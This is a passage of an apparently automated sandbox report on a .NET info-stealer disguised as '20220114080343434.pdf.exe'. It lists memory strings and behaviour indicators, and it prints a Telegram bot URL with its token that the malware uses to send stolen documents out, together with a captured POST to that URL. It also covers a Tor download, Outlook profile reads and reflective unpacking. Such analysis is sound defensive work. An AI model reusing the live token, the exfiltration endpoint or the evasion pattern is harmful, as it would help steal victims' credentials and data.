Source: 20220114080343434.pdf.exe, 00000000.00000003.295330398.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295411677.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/denHp
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 20220114080343434.pdf.exe, 00000000.00000003.294959412.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295250238.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295114414.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295200642.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmNp
Source: 20220114080343434.pdf.exe, 00000000.00000003.294959412.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295114414.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmSw
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.micro.
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283710366.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283067842.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282926493.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282954072.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283094856.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283849906.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283794895.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283036793.0000000005CF3000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283067842.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283094856.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283036793.0000000005CF3000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.comW
Source: 20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.coma
Source: 20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282954072.0000000005CF3000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.coms
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288918153.0000000005CF3000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: 20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kra-e
Source: 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krr-t
Source: 20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kru-hX
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: 20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com5v
Source: 20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comic
Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.net
Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.net(
Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284128821.0000000005CEB000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netiv
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.292550293.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dec
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dedc
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dem
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286803625.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cne&
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentdocument-----
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: RegSvcs.exe, 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmpString found in binary or memory: https://xXcVm5kmD6Gyza.org
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://xXcVm5kmD6Gyza.org(
                      Source: unknownHTTP traffic detected: POST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9d77ee3312256Host: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.311203434.0000000000F48000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: 20220114080343434.pdf.exe
                      .NET source code contains very large array initializations
                      Source: 8.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 20220114080343434.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_0138CA14
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_0138EE70
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_0138EE60
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_074480E0
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07440B14
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07440040
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07440035
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_074480D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F1FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F2618
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FF2F5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FD2E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FB118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F9DB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FE000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F6520
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F7D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F93B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F43A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F1620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F76E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F1DC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017FA86E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017FA8D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F1E68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_058247A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05824790
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05824773
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0582D660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05823CEF
                      Source: 20220114080343434.pdf.exeBinary or memory string: OriginalFilename vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320650494.00000000072C0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000000.280755361.0000000000872000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWellKnownSidTy.exe0 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.311203434.0000000000F48000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exeBinary or memory string: OriginalFilenameWellKnownSidTy.exe0 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\20220114080343434.pdf.exe "C:\Users\user\Desktop\20220114080343434.pdf.exe"
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20220114080343434.pdf.exe.log
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@1/2
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\EwKDsJegaFtJBPaA
                      Source: 8.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 20220114080343434.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 20220114080343434.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: 20220114080343434.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WellKnownSidTy.pdb source: 20220114080343434.pdf.exe

                      Data Obfuscation:

                      .NET source code contains potential unpacker
                      Source: 20220114080343434.pdf.exe, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 20220114080343434.pdf.exe, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: 0.0.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: 0.2.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07441B5D push edi; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F1F32 push es; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F7A37 push edi; retn 0000h
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F60F0 push es; ret
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.23442041847

                      Hooking and other Techniques for Hiding and Protection:

                      Uses an obfuscated file name to hide its real file extension (double extension)
                      Source: Possible double extension: pdf.exeStatic PE information: 20220114080343434.pdf.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
